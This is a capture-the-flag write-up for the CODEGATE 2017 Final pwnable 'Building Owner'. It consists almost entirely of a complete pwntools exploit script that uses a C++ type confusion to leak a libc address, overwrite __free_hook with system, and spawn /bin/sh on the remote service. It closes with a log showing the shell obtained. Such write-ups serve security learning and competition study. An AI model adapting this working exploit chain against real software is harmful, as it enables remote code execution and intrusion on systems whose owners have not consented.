CODEGATE 2017 FINAL - Building Owner

Category : Pwnables 

owner

Summary : type confusion, c++, free heap

Exploit

#!/usr/bin/python from pwn import * from struct import pack, unpack p = lambda x : pack("<Q", x) up = lambda x : unpack("<Q", x)[0] HOST = 'cykor.kr' PORT = 7979 def create_apart(s, name, floor, house, desc): s.sendline('1') s.recvuntil('> ') s.recvuntil('? \n') s.sendline(name) s.recvuntil('? ') s.sendline(str(floor)) s.recvuntil('? ') s.sendline(str(house)) s.recvuntil(': ') s.sendline(desc) def m(s, menu): s.sendline(str(menu)) s.recvuntil('> ') s = remote(HOST, PORT) create_apart(s, 'pwn3r', 45, 45, 'pwn3r') # apart1 create_apart(s, 'pwn4r', 45, 45, 'pwn4r') # apart2 #create_apart(s, 'pwn5r', 45, 45, 'pwn5r') # apart3 m(s, 4) # manage m(s, 2) # manage - change buliding m(s, 1) # type - apartment m(s, 1) # from apart1 m(s, 2) # to restaurant m(s, 4) # back (now manage) m(s, 1) # manage - edit m(s, 1) # type - apartment m(s, 1) # apart2 m(s, 1) # 1. name s.recvuntil('Enter new name : ') s.sendline('B'*0x70) m(s, 5) # back (now edit) # memory leak m(s, 3)    # type - restaurant m(s, 1)    # apart1 s.recvuntil('Normal price of menu : ') leaked = int(s.recvline()) print hex(leaked) main_arena_ptr = leaked - 0x90 m(s, 6) # 6. Normal price of menu s.sendline(str(main_arena_ptr)) m(s, 9) # back (now edit) m(s, 1) # type - apartment m(s, 1) # apart2 s.recvuntil('Name : ') main_arena = up(s.recvline()[:8]) - 88 libc = ELF('/lib/x86_64-linux-gnu/libc-2.24.so') libc_base = main_arena -0x3c1b00#libc.symbols['main_arena'] #libc.symbols['main_arena'] = main_arena free_hook = libc_base +libc.symbols['__free_hook'] system_libc = libc_base + libc.symbols['system'] m(s, 5) # back (now edit) m(s, 3) # type - restaurant m(s, 1) # apart1 m(s, 6) # 6. Normal price of menu s.sendline(str(free_hook)) m(s, 9) # back (now edit) m(s, 1) # type - aprtment m(s, 1) # apart2 m(s, 1) # name edit s.recvuntil('Enter new name : ') s.sendline(p(system_libc)) m(s, 5) # back (now edit) m(s, 3) # type - restaurant m(s, 1) # apart1 m(s, 6) # 6. Normal price of menu s.sendline(str(up('/bin/sh\x00'))) m(s, 9) # back (now edit) m(s, 4) # back (now manage) m(s, 4) # back (now home) m(s, 5) # exit s.interactive() """ pwn3r@cykor-ubuntu:~$ python owner_ex.py [+] Opening connection to cykor.kr on port 7979: Done 0x55c0908f8e50 [*] '/lib/x86_64-linux-gnu/libc-2.24.so'     Arch:     amd64-64-little     RELRO:    Partial RELRO     Stack:    Canary found     NX:       NX enabled     PIE:      PIE enabled [*] Switching to interactive mode $ id uid=1011(pwn3r) gid=1011(pwn3r) groups=1011(pwn3r) """